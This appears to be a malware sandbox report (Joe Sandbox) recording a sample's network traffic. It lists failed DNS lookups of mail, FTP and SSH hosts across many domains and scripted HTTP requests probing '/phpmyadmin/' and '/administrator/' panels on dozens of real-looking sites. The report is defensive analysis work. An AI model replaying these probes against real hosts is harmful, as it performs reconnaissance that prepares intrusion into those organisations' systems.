Source: unknownDNS traffic detected: query: ftp.linkan-group.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.maxiv.lu.se replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.healteas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.schmith.net replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: pop.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.privatemoe.ae replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.elitebusinesshn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.bayambnag.gov.ph replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.schmith.net replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: pop3.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.5.e9mbw4gh replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.bunasta.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: xtsagency.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.xegge.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.edgewater.group replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.digdig.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.5.e9mbw4gh replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.hmichaelandco.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.gmail.io replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.bayambnag.gov.ph replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.gstudent.ctu.edu.vn replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.gstudent.ctu.edu.vn replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: mailgate.bunasta.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.bosworthacademy.org replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: ssh.aoiit.store replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bayambnag.gov.ph replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.tnav.ru replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.privatemoe.ae replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.elitebusinesshn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.adm.uksw.edu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.killicit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.rochester-gauges.be replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.nohonetworks.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: imap.cringemonster.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.ibright.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.chandigarhuniversityazure.onmicrosoft.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.rdelealtad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.foundtoo.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.gstudent.ctu.edu.vn replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.firemailbox.club replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.paintd.plus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.highstreet-re.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.tnav.ru replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.lwindowelive.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.bunasta.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.bunasta.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.y3.qj51acp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.schmith.net replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: ftp.pixiil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.bayambnag.gov.ph replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.mnit.uc.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.elitebusinesshn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.healteas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ardcrushing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.goldenfishcompany.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mail.sofia-communications.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.xegge.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.ibright.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.member3.co.za replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: relay.dbschooldelhi.ac.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.esoft.academy replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.nohonetworks.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.heathcotebarr.eu replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.2l7g4s.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pop3.lgs-strategies.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mailgate.carelesscommunity.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: kvsroraipur.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ftp.mdystudent.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ssh.yahoo.comfreezed replaycode: Name error (3)
Source: unknownDNS traffic detected: query: smtp.member3.co.za replaycode: Name error (3)
Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox ViewIP Address: 81.169.145.157 81.169.145.157
Source: Joe Sandbox ViewIP Address: 81.169.145.157 81.169.145.157
Source: unknownNetwork traffic detected: DNS query count 555
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: krkconcord.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: directlendersllc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: t1eng.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gasp-ga.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mdystudent.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hmichaelandco.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: killicit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: esistem.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: integraledu.hrAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: prettypollycleaning.aeAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: americanrecords.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ondania.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: octetpowers.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.debritto.sch.idAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: capforge.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 2brosandahosepressurewashing.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmailvz.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tcetmumbai.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: quipuapp.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /login/?page=%2Fphpmyadmin%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=unid3p469s9hj2a6pka8sch23rUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: srmist.edu.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gccb.co.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: vivanettv.co.keAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: grg17geblergasse.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: coimbrausa.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: locandafrancigena.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: leeberg.dkAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: federwild.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: kappablu.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: financefast.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: vivanettv.co.keAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
